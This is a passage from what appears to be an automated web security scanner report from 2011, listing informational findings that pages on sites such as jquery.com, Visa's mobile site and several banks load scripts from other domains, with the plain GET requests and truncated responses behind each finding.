Host:   http://jquery.andreaseberhard.de
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: jquery.andreaseberhard.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:32 GMT
Server: Apache
Last-Modified: Mon, 22 Nov 2010 10:45:12 GMT
ETag: "b122be95-1a1b-4cea49b8"
Accept-Ranges: bytes
Content-Length: 6683
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

   <title>Plugins
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

17.28. http://jquery.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:59:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Jan 2011 15:06:39 GMT
ETag: "7520fc2-3ea2-c344bdc0"
Accept-Ranges: bytes
Content-Length: 16034
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

17.29. http://jquery.com/demo/thickbox/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /demo/thickbox/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /demo/thickbox/ HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:02:57 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 09 Oct 2009 17:03:07 GMT
ETag: "6039f1c-99fd-8dcc88c0"
Accept-Ranges: bytes
Content-Length: 39421
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.30. http://jquery.org/license  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.org
Path:   /license

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /license HTTP/1.1
Host: jquery.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Feb 2011 21:47:56 GMT
ETag: "79985ee-206a-9a0d5b00"
Accept-Ranges: bytes
Content-Length: 8298
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 02 Feb 2011 22:16:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.jquery.com/org/style.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

17.31. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 02 Feb 2011 22:11:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

17.32. http://learn.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.bankofamerica.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: learn.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:32 GMT
Server: Apache
Set-Cookie: JSESSIONID=2EDDFC892370188D9E9AEDDCC332827E; Path=/
Content-Language: en-US
Age: 7065
Content-Length: 18942
Keep-Alive: timeout=2, max=39
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=44922ab53660;expires=Wed, 02-Feb-11 23:11:32 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>Personal F
...[SNIP]...
</script><script src="http://amch.questionmarket.com/adsc/d732316/2/735690/randm.js" type="text/javascript">//</script>
...[SNIP]...
<meta content="w_aPC7FY1aXXQNDVNWnsN5fw6TKKB9XIUhqNJ76oAdE" name="google-site-verification" /><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d669226/4/669523/randm.js">//</script><script src="http://amch.questionmarket.com/adsc/d775669/2/776033/randm.js" type="text/javascript">//</script>
...[SNIP]...
<!-- dl exposed: bridge Jul-2010 -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d732316/3/735689/randm.js"></script>
...[SNIP]...
<img border="0" width="1" height="1" class="offPage" src="http://amch.questionmarket.com/adsc/d698741/4/698763/adscout.php?ord=[randnum]" /><script src="http://amch.questionmarket.com/adsc/d775669/3/776034/randm.js" type="text/javascript">//</script>
...[SNIP]...

17.33. http://m.usa.visa.com/m/assistance/access.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/assistance/access.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/assistance/access.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 2957
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=00017PTaTqr64hoPCKncf_CR42G:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 22:00:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta ht
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.34. http://m.usa.visa.com/m/assistance/contact.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/assistance/contact.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/assistance/contact.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 7325
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001eta3hA9DoZXIPs04uLdlCEC:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 22:00:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta ht
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.35. http://m.usa.visa.com/m/assistance/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/assistance/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/assistance/index.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 3055
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001Gy0Aop96MsFElvz576vJl5E:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta ht
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.36. http://m.usa.visa.com/m/assistance/lost.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/assistance/lost.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/assistance/lost.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 28817
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001adTeLbI5vDToIoqioYMrI8g:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 22:00:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.37. http://m.usa.visa.com/m/cards/buxx.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/cards/buxx.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/cards/buxx.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 5245
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001C430xoshVnZkjG8KlhbBQjL:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:48 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.38. http://m.usa.visa.com/m/cards/credit.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/cards/credit.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/cards/credit.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 4728
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001J8MkcqBjhHzx1xkGye--WzE:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:47 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.39. http://m.usa.visa.com/m/cards/debit.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/cards/debit.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/cards/debit.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 6782
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001Ux2C2iT5gxRwmHPqbypwFGg:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:53 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.40. http://m.usa.visa.com/m/cards/gift.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/cards/gift.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/cards/gift.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 4556
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001xbaVCh7MAT5ZZYdNDCcodfY:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:48 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.41. http://m.usa.visa.com/m/cards/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/cards/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/cards/index.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 5017
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=00013rltRd4RSwkaoBOa6Rxw4hg:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:46 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.42. http://m.usa.visa.com/m/cards/prepaid.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/cards/prepaid.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/cards/prepaid.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 5576
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001j4NjcvkrkbyW7cCAxOTFT-z:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:48 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.43. http://m.usa.visa.com/m/cards/readylink.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/cards/readylink.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/cards/readylink.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 4347
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001IiyhAZFqdQlmGBGG3xZ7DkA:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:53 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.44. http://m.usa.visa.com/m/cards/travelmoney.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/cards/travelmoney.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/cards/travelmoney.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 5880
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001n902j73dVwFGfURXqag3jk7:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:50 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.45. http://m.usa.visa.com/m/discounts/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/discounts/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/discounts/index.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 11577
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001wZ8hA8OLFPGN8J4eyN9aOQ_:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:58 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.46. http://m.usa.visa.com/m/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/index.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 2965
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001zlLQohpwqB2AM_AjTijOuAX:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:46 GMT

<?xml version="1.0" encoding="UTF-8" ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml
...[SNIP]...
</div>


<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.47. http://m.usa.visa.com/m/legal.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/legal.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m/legal.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 6444
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001ucYXfUVlCbmqykdFFUeFDI2:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.48. http://mir.aculo.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mir.aculo.us
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: mir.aculo.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Wed, 02 Feb 2011 22:02:05 GMT
Content-Type: text/html
Content-Length: 42082
Last-Modified: Wed, 02 Feb 2011 21:53:00 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</div>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.49. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myaccounts.navyfcu.org
Path:   /cgi-bin/ifsewwwc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cgi-bin/ifsewwwc?Logon HTTP/1.1
Host: myaccounts.navyfcu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:06 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpool-MYACCOUNTS-IFSE_1443=1091045898.41733.0000; path=/
Content-Length: 15013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template filename: LogonForm.html 65 -->
<html xmlns="http://www.w3.org/1
...[SNIP]...
</title>
<script src="https://www.navyfederal.org/js/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="https://www.navyfederal.org/js/jquery-ui-1.8.4.custom.min.js"></script>
<script type="text/javascript" src="https://www.navyfederal.org/js/facebox.js"></script>
<script language="javascript" type="text/javascript" src="https://www.navyfederal.org/js/jquery.pngFix.js"></script>
...[SNIP]...

17.50. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.change.org
Path:   /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi HTTP/1.1
Host: news.change.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "28489c2640e7e647e78a76edbda15c6b"
X-Runtime: 762
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: change_session_id=1aa1d10d1da46ec2aca2275d21a57c9b; domain=.change.org; path=/; HttpOnly
Content-Length: 22339
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7]> <html class="no-js ie6" lang="en-US" xml:lang="en-US" xmlns=
...[SNIP]...
</script>

<script src="//connect.facebook.net/en_US/all.js#xfbml=1?69" type="text/javascript"></script>

